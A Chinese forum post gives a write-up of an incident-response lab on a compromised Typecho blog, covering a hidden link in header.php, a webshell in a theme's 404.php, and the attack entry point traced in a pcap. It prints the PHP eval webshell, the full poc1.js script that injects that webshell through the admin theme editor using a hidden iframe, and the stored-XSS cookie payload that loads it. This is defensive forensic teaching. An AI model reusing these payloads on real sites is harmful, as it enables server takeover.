玄机——第五章 linux实战-黑链 wp

打印 上一主题 下一主题

主题 529|帖子 529|积分 1587

一、前言

题目链接:第五章 linux实战-黑链
三连私信免费送玄机注册约请码私信!!!看见就回!!留意私信!!
首先简朴了解一下什么是黑链;
官方一点就是在网络安全领域,“黑链”(Black Hat SEO Links)是指通过不合法手段在网站上添加的链接,这些链接通常指向不良内容或恶意网站,目的是进步这些网站的搜索引擎排名或传播恶意软件。这种行为违背了搜索引擎的服务条款,也会对受影响的网站造成负面影响,包括搜索引擎惩罚和用户流失。
黑链的特征

  • 隐蔽链接:黑链通常隐蔽在网站页面中,利用CSS、JavaScript或其他手段使其对平凡用户不可见,但仍然能被搜索引擎爬虫检测到。
  • 恶意内容:这些链接指向的内容大概包含恶意软件、垂纶页面或其他不良内容,试图感染用户的计算机或窃取个人信息。
  • 伪装链接:黑链大概伪装成合法的链接,通过利用误导性的锚文本或URL,诱导用户点击。
  • 大量生成:黑链通常通过自动化工具大量生成,散布在多个网站上,以进步恶意网站的搜索引擎排名。
总结来说,黑链是一种通过不合法手段在网站上植入的链接,旨在提升恶意网站的搜索引擎排名或传播恶意软件。
实战案例
在实际操作中,黑链通常通过以下方式植入:


  • 网站毛病:利用网站或插件的毛病,通过SQL注入、跨站脚本(XSS)等手段植入黑链。
  • 权限滥用:通过获取网站管理员权限,手动添加黑链。
  • 文件上传毛病:通过上传恶意文件(如带有后门的PHP文件),在服务器上实行代码,植入黑链。
例子
  1. <!-- 正常链接 -->
  2. <a href="http://legit-site.com">Legit Site</a>
  3. <!-- 黑链 -->
  4. <a href="http://malicious-site.com" style="display:none;">Hidden Link</a>
复制代码
二、概览

简介

服务器场景操作体系 Linux
服务器账号密码 root xjty110pora 端口 2222
任务情况阐明
注:样本请勿在本地运行!!!样本请勿在本地运行!!!样本请勿在本地运行!!!
应急相应工程师小王或人收到安全装备告警服务器被植入恶意文件,请上机排查
开放题目
毛病修复
参考

1、找到黑链添加在哪个文件 flag 格式 flag{xxx.xxx}
2、webshell的绝对路径 flag{xxxx/xxx/xxx/xxx/}
3、黑客注入黑链文件的 md5 md5sum file flag{md5}
4、攻击入口是哪里?url哀求路径,最后面加/ flag{/xxxx.xxx/xxxx/x/}
三、参考文章

玄机应急相应wp
四、步骤(解析)

准备步骤#1.0

利用Xshell毗连,新建或者利用SSH都可,留意靶机端口号;(具体操作不再多述)
留意:如是“校园网”毗连的,出口流量大概会受到限定,建议更换“手机热门”;
新建毗连;

成功毗连;

步骤#1.1

找到黑链添加在哪个文件 flag 格式 flag{xxx.xxx}

解题思绪
题目让我们提交黑链地点文件中的文件名,那我们有访问服务器的权限,就可以手动检查网站的HTML和PHP文件,探求可疑的代码片段,或者检查特定的文件夹,某些文件夹更容易被黑客攻击,常见的如 /var/www/html,/tmp,/uploads,/images 等,再不行的话,由于靶机是在Linux服务器上,所以我们可以利用命令行工具进行全面搜索;
查找文件中包含“黑链”的内容;
  1. grep -rnw '/var/www/html/' -e '黑链'
复制代码
得到;

简朴分析一下;


  • -r:递归搜索。这个选项告诉 grep 在指定目录下的全部子目录中进行搜索。
  • -n:显示行号。这个选项会在匹配的行前面显示行号,方便定位。
  • -w:匹配整个单词。这个选项告诉 grep 只匹配整个单词(即匹配边界)。在这里,黑链 被视为一个完整的单词,只有当它作为一个独立的单词出现时才会被匹配。
  • -e '黑链':指定要搜索的字符串。在这个例子中,我们要搜索的是包含 黑链 字符串的全部文件。
那有的师傅大概就要问了,为什么你就知道是“/var/www/html/”这个目录?
由于在很多应急中,这些文件夹更容易被黑客攻击,常见的如 /var/www/html,/tmp,/uploads,/images 等,简朴来说就是一个个排查已往的,也并不是一开始就直接查目录“var/www/html”的;
那有的师傅又有疑问了,为什么你就知道搜索关键字“黑链”呢?
实在吧,简朴来说就是“黑链”是指在网页上暗中加入的恶意链接,这些链接通常会引导用户访问恶意网站、进行垂纶攻击或传播恶意软件。黑链大概不会直接利用“黑链”这个关键词,而是大概通过其他方式隐蔽和伪装。然而,在一些案例中,攻击者大概会在源代码中留下特定的标志或注释以便自己辨识和管理这些黑链。
为什么查找关键词“黑链”?

  • 攻击者的疏忽或习惯:有些攻击者在嵌入黑链时大概会在注释或标签中留下“黑链”字样,方便自己管理和识别。固然这种情况不常见,但不排除攻击者粗心或有特定习惯。
  • 方便管理:在一些攻击活动中,攻击者大概会利用特定的关键词作为标志,以便在后续的维护和管理中快速定位这些链接。
但是实际情况是;
在实际情况中,黑链通常不会直接标志为“黑链”。它们大概会隐蔽在平凡的链接或其他代码中。以下是一些更常见的黑链隐蔽方式:

  • 隐蔽的 HTML 元素:利用 CSS 将链接隐蔽在网页中,如 display:none 或 visibility:hidden。
  • JavaScript 动态加载:利用 JavaScript 动态加载黑链,使其在页面加载时才出现。
  • URL 重定向:通过 URL 重定向,将合法链接引导到恶意网站。
  • 伪装成正常内容:黑链大概伪装成正常的内容或链接,混杂在正常网页内容中。
那如果通常我们该如何有用地查找黑链呢?
由于黑链大概以多种方式隐蔽,以下是一些更有用的查找方法:

  • 查察异常链接:利用 grep 或其他工具查找全部外部链接,并检查是否有异常链接指向可疑网站。
    grep -rni 'href=' /var/www/html/
  • 查察 JavaScript 文件:检查 JavaScript 文件中的可疑代码或动态加载的链接。
    grep -rni 'http' /var/www/html/
  • 利用专业工具:利用安全扫描工具,如 D盾、ClamAV、AIDE 等,来扫描并检测网页文件中的恶意代码和黑链。
  • 人工查察:结合自动化工具和人工查察,特别是检查注释和可疑的代码块。(这点基本上就是全部排查完了,实在没办法了的才会进行查察)
总结;
我们固然直接查找关键词“黑链”发现一些攻击者留下的标志,但这种方法的成功率较低。(大概实战里很少出现这种情况)更有用的方法是通过体系性扫描和分析,结合人工查察来检测和清理黑链。分析全部链接和代码中的可疑部门是识别黑链的关键。
题目让我们提交黑链地点的文件;
所以;
  1. flag{header.php}
复制代码
当然这题也远不止这一种解法,刚刚上面也有说过,可以利用D盾进行扫描出“黑链”,那我们这里就可以尝试一下到底行不行;
这里我直接利用"Xftp"毗连靶机,导出源码(/var/www/html),老规矩,新建毗连,留意“校园网”换成“手机热门”即可,以防毗连不上;
Xftp毗连成功,开始传输"/var/www/html";

导出完成,开始利用"D盾"开始扫描;
得到;

固然确实没有扫出来,但是我看了其它师傅的wp,发现导出源码可以另外一种方法进行查找;
这里我利用的是“vscode”,这就是一个我常常写js前端的,接着将我们源码文件“html"导入到“vscode”的工作区(不必要工作区也行,导入进行即可);
得到;

接着,选中文件“html”选择“在文件中查找”,输入“黑链”也是可以定位到的;

最后;

这里我举的例子是“vscode”,当然肯定不止“vscode”可以做到这样,雷同的还有很多,方法不唯一,仅供参考;
步骤#1.2

webshell的绝对路径 flag{xxxx/xxx/xxx/xxx/}

解题思绪
题目让我们提交webshell的具体路径,那就是查杀webshell呗,当然这里也可以手工查杀同样也是可以工具进行查杀,那当然这里没有限定我们肯定是怎么方便怎么来对吧而且源码我们也导出来了(var/www/html),要说工具中,我肯定最喜欢的就是“D盾”,由于便捷实用嘛,话不多说,直接把文件“html”丢进“D盾”进行查杀(实在题一已经做过一遍了,但是怕有新来的师傅不明白,所以还再演示一遍最好);
这里手工查杀webshell就不再多演示了,详细请看:应急相应-webshell查杀
由于题一源码已导出“var/www/html”,这里不再多叙;
利用D盾进行查杀;

扫出来三个,一个一个跟进分析即可,最后是在文件“404.php”里面发现了webshell;
右键记事本打开;

简朴分析一下,为什么就可以确定这个是webshell呢?

  • 多个 eval($_POST['a']) 语句
    <?php @eval($_POST[a]); ?> <?php @eval($_POST[a]); ?> <?php @eval($_POST[a]); ?> <?php @eval($_POST[a]); ?> <?php @eval($_POST[a]); ?> <?php @eval($_POST[a]); ?>


  • eval函数的利用:eval 函数将传入的字符串作为 PHP 代码实行,这种用法非常危险,由于它答应实行任何传入的代码。
  • @符号的利用:@ 符号用于克制错误信息,目的是隐蔽错误,增加隐蔽性。
  • 接收用户输入:这里的 $_POST['a'] 表示从 POST 哀求中接收输入并实行。这意味着攻击者可以通过发送特定的 POST 哀求来实行任意 PHP 代码。

  • 重复的 eval($_POST['a']) 语句
    <?php @eval($_POST[a]); ?> <?php @eval($_POST[a]); ?> <?php @eval($_POST[a]); ?> <?php @eval($_POST[a]); ?> <?php @eval($_POST[a]); ?> <?php @eval($_POST[a]); ?>
重复:这些语句被重复了多次,大概是为了增加成功实行的概率或者增加代码的混淆性。

  • 混杂在正常代码中的恶意代码
    <?php phpinfo(); ?> <?php @eval($_POST[a]); ?> <?php @eval($_POST[a]); ?> <?php @eval($_POST[a]); ?> <?php @eval($_POST[a]); ?> <?php @eval($_POST[a]); ?> <?php @eval($_POST[a]); ?> <?php phpinfo(); ?>
正常代码:文件中还包含了正常的 PHP 代码,如 phpinfo() 和一些模板代码。这种混杂的方式使得恶意代码不易被发现。
模板代码
  1. <?php if (!defined('__TYPECHO_ROOT_DIR__')) exit; ?>
  2. <?php $this->need('header.php'); ?>
  3. <div class="col-mb-12 col-tb-8 col-tb-offset-2">
  4.     <div class="error-page">
  5.         <h2 class="post-title">404 - <?php _e('页面没找到'); ?></h2>
  6.         <p><?php _e('你想查看的页面已被转移或删除了, 要不要搜索看看: '); ?></p>
  7.         <form method="post">
  8.             <p><input type="text" name="s" class="text" autofocus/></p>
  9.             <p>
  10.                 <button type="submit" class="submit"><?php _e('搜索'); ?></button>
  11.             </p>
  12.         </form>
  13.     </div>
  14. </div><!-- end #content-->
  15. <?php $this->need('footer.php'); ?>
复制代码
这些代码看起来是正常的模板代码,负责显示一个 404 错误页面。但是它们与恶意代码混杂在一起。
最后总结;

  • eval 函数的滥用:利用 eval 函数并从用户输入中接收代码实行,这是一个明确的安全风险。
  • 隐蔽性:利用 @ 符号隐蔽错误信息,增加隐蔽性。
  • 混淆:恶意代码与正常代码混杂在一起,试图隐蔽其存在。
  • 多次重复:多次重复的恶意代码大概是为了增加实行成功的机会。
这些特点共同表明这个文件包含恶意代码,而且具备 webshell 的特征,使攻击者能够远程实行任意代码,控制服务器。
题目让我们提交webshell的具体路径;
至此;
  1. flag{/var/www/html/usr/themes/default/404.php}
复制代码
步骤#1.3

黑客注入黑链文件的 md5 md5sum file flag{md5}

解题思绪
题目让我们提交黑客注入的黑链文件的MD5,一样平常黑客注入黑链文件,常见的有;

  • JavaScript


  • 方法:通过 JavaScript 代码动态插入隐蔽链接或 iframe。
  • 特点:可以通过脚本在用户欣赏页面时及时插入黑链,常见于页面底部或隐蔽的元素中。

  • HTML


  • 方法:直接在 HTML 文件中嵌入隐蔽的链接。
  • 特点:链接通常设置为 display: none 或放置在不可见的位置(如超出视口的区域)。

  • PHP


  • 方法:在 PHP 文件中嵌入生成隐蔽链接的代码。
  • 特点:利用服务器端代码生成黑链,可以隐蔽在模板文件、插件文件等处,较难被发现。

  • CSS


  • 方法:通过 CSS 文件界说隐蔽链接的样式。
  • 特点:利用 display: none、visibility: hidden 或 position: absolute; left: -9999px 等方式隐蔽链接。

  • iframe


  • 方法:在页面中嵌入一个隐蔽的 iframe,iframe 内部加载包含黑链的页面。
  • 特点:iframe 可以指向外部恶意页面,通过隐蔽的 iframe 难以被发现。

  • .htaccess


  • 方法:利用 Apache 服务器的 .htaccess 文件进行 URL 重写,植入黑链。
  • 特点:通过重写规则隐蔽地将用户引导至黑链页面。
这里我们就可以重点排查这类的危险文件,但是我发现题二查杀webshell的时候也出现了一个".js"的文件,我们可以先从这里下手,由于毕竟是"D盾"查杀的嘛,分析也要分析完整;
得到;

跟进分析,右键记事本打开进行查察;
得到;

简朴分析一下;

  • 插入 iframe 元素
    1. function insertIframe() {
    2.      var urlWithoutDomain = window.location.pathname;
    3.      var hasManageComments = urlWithoutDomain.includes("manage-comments.php");
    4.      var tSrc='';
    5.      if (hasManageComments){
    6.          tSrc=urlWithoutDomain.replace('manage-comments.php','theme-editor.php?theme=default&file=404.php');
    7.      }else{
    8.          tSrc='/admin/theme-editor.php?theme=default&file=404.php';
    9.      }
    10.      var iframeAttributes = "<iframe id='theme_id' src='"+tSrc+"' width='0%' height='0%' onload='writeShell()'></iframe>";
    11.      var originalContent = document.body.innerHTML;
    12.      document.body.innerHTML = (originalContent + iframeAttributes);
    13. }
    复制代码


  • 功能:这个函数会在网页末了插入一个隐蔽的 iframe 元素。(上面总结常见的黑链文件也有进行阐明)
  • 条件判断:通过 window.location.pathname 判断当前页面是否包含 “manage-comments.php”。
  • 目标页面:根据条件设置 iframe 的 src 属性为差异的地点,最终都是指向一个主题编辑页面 (theme-editor.php),并指定要修改的文件为 404.php。

  • 写入 PHP 代码并生存
    1. var isSaved = false;
    2. function writeShell() {
    3.      if (!isSaved) {
    4.          var content = document.getElementById('theme_id').contentWindow.document.getElementById('content');
    5.          var btns = document.getElementById('theme_id').contentWindow.document.getElementsByTagName('button');
    6.          var oldData = content.value;
    7.          content.value = ('<?php @eval($_POST[a]); ?>\n') + oldData;
    8.          btns[1].click();
    9.          isSaved = true;
    10.      }
    11. }
    复制代码


  • 全局变量 isSaved:用于确保恶意代码只被实行一次。
  • 获取 iframe 内的内容:通过 document.getElementById('theme_id').contentWindow.document 访问 iframe 内部的 DOM。
  • 修改内容:获取 textarea 元素(content),在其原始内容前插入一段恶意 PHP 代码 <?php @eval($_POST[a]); ?>。
  • 模仿生存操作:找到并点击生存按钮(btns[1].click())。

  • 插入 iframe 并实行写入操作
    1. insertIframe();
    复制代码
调用 insertIframe 函数:在页面加载时实行,插入 iframe 并触发写入恶意代码的操作。
最后总结;


  • 插入隐蔽的 iframe:恶意代码常用手法,通过隐蔽的 iframe 实行恶意操作。
  • 条件判断目标页面:确定要修改的页面为 theme-editor.php,这是一个答应用户修改网站模板的页面。
  • 写入恶意 PHP 代码:明确包含 <?php @eval($_POST[a]); ?> 这段代码,这是一个经典的 Webshell 代码,答应攻击者通过 POST 哀求实行任意 PHP 代码。
  • 模仿生存操作:自动点击生存按钮,将恶意代码生存到模板文件中。
这里任意拿出一条足以确认文件有大题目它有那么多,那肯定就不言而喻咯;
综上所述;
   这段代码通过插入一个隐蔽的 iframe 并利用 iframe 内部的表单来向网站模板文件注入恶意 PHP 代码,然后自动生存。这是一种范例的黑链注入手法,目的是在受感染的网站中嵌入恶意代码,从而控制服务器或窃取数据。通过分析代码的功能和意图,可以确定其恶意性子。
  题目让我们提交文件的MD5,为了便捷些嘛,由于这里我们已经导出了源码(var/www/html)所以我们可以直接利用windows自带的文件MD5加密;
1.找到“poc1.js”当前目录,鼠标右键“在终端中打开”或者在“html”路径栏,直接cmd回车即可打开;(打开方法不唯一,仅供参考)
2.输入certutil -hashfile <文件名称> MD5,回车后,即可校验文件的MD5了(留意写绝对路径)
鼠标右键打开终端;

输入“cmd”回车进入终端;

输入命令;
  1. certutil -hashfile .\poc1.js MD5
复制代码
最后得到;

至此;
  1. flag{10c18029294fdec7b6ddab76d9367c14}
复制代码
当然也可以直接在靶机上直接输入命令;(留意同样进入到文件当前目录)
  1. md5sum poc1.js
复制代码
也是可以得到;(可以说一个是windows自带的,一个是Liunx自带的);

步骤#1.4

攻击入口是哪里?url哀求路径,最后面加/ flag{/xxxx.xxx/xxxx/x/}

解题思绪
题目让我们提交攻击入口的URL哀求路径,那这里要分析一个潜伏的攻击入口和确定黑链植入的 URL 哀求路径,我们必要通过分析网络流量捕捉文件(pcap 文件)来找出可疑的 HTTP 哀求和相应,那这里返回靶机的根目录刚好就发现了一个“output.pcap”流量包,那就不必要多想了,肯定是为我们准备的,直接导出丢进“Wireshark”分析即可(不知道咋压缩导出的,那我们可以直接利用Xftp进行毗连传输导出即可)
发现流量包“output.pcap”,利用Xftp导出进行分析;(实在/var/www/html目录下也发现了,output.pcap流量包,对比了一下发现两个都是一样的)

丢进“Wireshark”进行分析;

在 Wireshark 的过滤器中输入 http 以过滤出全部 HTTP 哀求和相应。这将使我们能够专注于与 Web 流量相关的数据包,当然这里也可以直接尝试定位文件“poc1.js”,由于题三我们已经找到了黑客注入的文件是“poc1.js”,所以我们可以尝试查找一下相关的数据包;
利用命令;
  1. http contains "poc1.js"
复制代码
查找数据包带有关键字符串“poc1.js”
得到;

我个人比较喜欢数据包从大到小进行分析,当然这里也是一样;
那我们右键追踪http进行分析;
得到;

简朴分析一下;
哀求内容;
  1. GET /poc.js HTTP/1.1
  2. Host: 192.168.20.130
  3. Connection: keep-alive
  4. Cache-Control: max-age=0
  5. Upgrade-Insecure-Requests: 1
  6. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
  7. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  8. Accept-Language: zh-CN,zh;q=0.9
  9. Cookie: 09f1f9758c26c309477b55f3a4bac8de__typecho_remember_author=haha; 09f1f9758c26c309477b55f3a4bac8de__typecho_remember_mail=haha%40haha.com; 09f1f9758c26c309477b55f3a4bac8de__typecho_remember_url=http%3A%2F%2Fxxx.xxx.com%2F%22%3E%3C%2Fa%3E%3Cscript%2Fsrc%3Dhttp%3A%2F%2F192.168.20.130%2Fpoc.js%3E%3C%2Fscript%3E%3Ca%2Fhref%3D%22%23
  10. If-None-Match: W/"657971d7-817"
  11. If-Modified-Since: Wed, 13 Dec 2023 08:56:55 GMT
  12. Accept-Encoding: gzip, deflate
复制代码
哀求分析

  • 哀求的路径

    • GET /poc.js HTTP/1.1 哀求了 /poc.js 这个 JavaScript 文件。
    • Host: 192.168.20.130 表示这是一个内部网络 IP 地点。

  • 可疑的 Cookie 信息

    • Cookie: 09f1f9758c26c309477b55f3a4bac8de__typecho_remember_url=http%3A%2F%2Fxxx.xxx.com%2F%22%3E%3C%2Fa%3E%3Cscript%2Fsrc%3Dhttp%3A%2F%2F192.168.20.130%2Fpoc.js%3E%3C%2Fscript%3E%3Ca%2Fhref%3D%22%23
    • 这里的 Cookie 包含了一段注入的 JavaScript 代码,显然是黑链攻击的一部门。

相应分析(这里js太长了,就不单独放了)


  • 该相应内容是一个 JavaScript 文件,它会插入一个 iframe,并在其中实行恶意代码。
  • 具体代码会尝试加载 theme-editor.php,并在其中写入 PHP webshell 代码:<?php @eval($_POST[a]); ?>
最后总结;


  • 攻击入口:通过哀求 /poc.js 这个路径,黑客利用 JavaScript 代码注入了恶意代码。
  • URL 哀求路径:/poc.js 加载了恶意 JavaScript 文件,这个文件试图通过 iframe 和 theme-editor.php 来修改服务器上的文件并植入 webshell,所以这里很遗憾,这条数据包并没有提到攻击入口的URL,不外不要紧,我们可以继承往下一条一条进行分析;
刚刚没留意,突然发现下面有一个反弹的“poc1.js“;

右键追踪http,简朴分析一下;
这个HTTP哀求中包含了一个名为poc1.js的文件,这个文件是通过注入到Cookie中的JavaScript代码引入的。
哀求与相应分析
HTTP哀求
  1. GET /index.php/archives/1/ HTTP/1.1
  2. Host: 192.168.20.130
  3. Connection: keep-alive
  4. Cache-Control: max-age=0
  5. Upgrade-Insecure-Requests: 1
  6. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
  7. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  8. Referer: http://192.168.20.130/index.php/archives/1/
  9. Accept-Language: zh-CN,zh;q=0.9
  10. Cookie: 09f1f9758c26c309477b55f3a4bac8de__typecho_remember_author=haha; 09f1f9758c26c309477b55f3a4bac8de__typecho_remember_mail=haha%40haha.com; 09f1f9758c26c309477b55f3a4bac8de__typecho_remember_url=http%3A%2F%2Fxxx.xxx.com%2F%22%3E%3C%2Fa%3E%3Cscript%2Fsrc%3Dhttp%3A%2F%2F192.168.20.130%2Fpoc1.js%3E%3C%2Fscript%3E%3Ca%2Fhref%3D%22%23
  11. Accept-Encoding: gzip, deflate
复制代码
HTTP相应
  1. HTTP/1.1 200 OK
  2. Server: nginx
  3. Date: Wed, 13 Dec 2023 10:00:07 GMT
  4. Content-Type: text/html; charset=UTF-8
  5. Transfer-Encoding: chunked
  6. Connection: keep-alive
  7. Vary: Accept-Encoding
  8. X-Pingback: http://192.168.20.130/index.php/action/xmlrpc
  9. Content-Encoding: gzip
复制代码
关键点分析
1、Cookie注入的代码
  1. 09f1f9758c26c309477b55f3a4bac8de__typecho_remember_url=http%3A%2F%2Fxxx.xxx.com%2F%22%3E%3C%2Fa%3E%3Cscript%2Fsrc%3Dhttp%3A%2F%2F192.168.20.130%2Fpoc1.js%3E%3C%2Fscript%3E%3Ca%2Fhref%3D%22%23
复制代码
URL解码得到;(这里我直接解码得出)
URL在线解码
得到;

实在这是一个毛病;(更多信息请大家自行查察链接,这里不再进行夸大)
具体:Typecho1.2 - 1.2.1-rc前台批评存储xss到rce 毛病复现-分析-修复
所以这段Cookie中包含了一段恶意的JavaScript代码注入:<script src="http://192.168.20.130/poc1.js"></script>


  • poc1.js文件

    • 通过这个哀求,欣赏器会加载并实行http://192.168.20.130/poc1.js文件中的代码。

  • Referer头

    • Referer头指向了http://192.168.20.130/index.php/archives/1/,表明这是泉源页面。
    • Referer头通常包含了用户访问的上一个页面地点,这是一个指向包含恶意代码的页面的明确指示。

确定反弹的“poc1.js”原因;


  • 恶意代码的注入

    • Cookie中注入的JavaScript代码通过<script src="http://192.168.20.130/poc1.js"></script>将poc1.js文件引入到http://192.168.20.130/index.php/archives/1/页面。
    • 这意味着每次访问/index.php/archives/1/页面时,都会加载并实行poc1.js。

  • URL路径

    • 通过Referer头和哀求路径,我们可以确定poc1.js文件是从/index.php/archives/1/页面加载的。
    • 这表明该页面是恶意代码注入的入口和载体。

最后总结;
   哀求和相应中包含的信息表明http://192.168.20.130/index.php/archives/1/页面是黑链攻击的入口,通过Cookie注入的JavaScript代码引入了poc1.js文件,从而实行了恶意操作。这个URL是反弹的“poc1.js”的原因在于其作为恶意代码的载体和入口。
  题目让我们提交攻击入口的URL哀求路径;
URL哀求路径:http://192.168.20.130/index.php/archives/1/
至此;
  1. flag{/index.php/archives/1/}
复制代码
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

耶耶耶耶耶

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表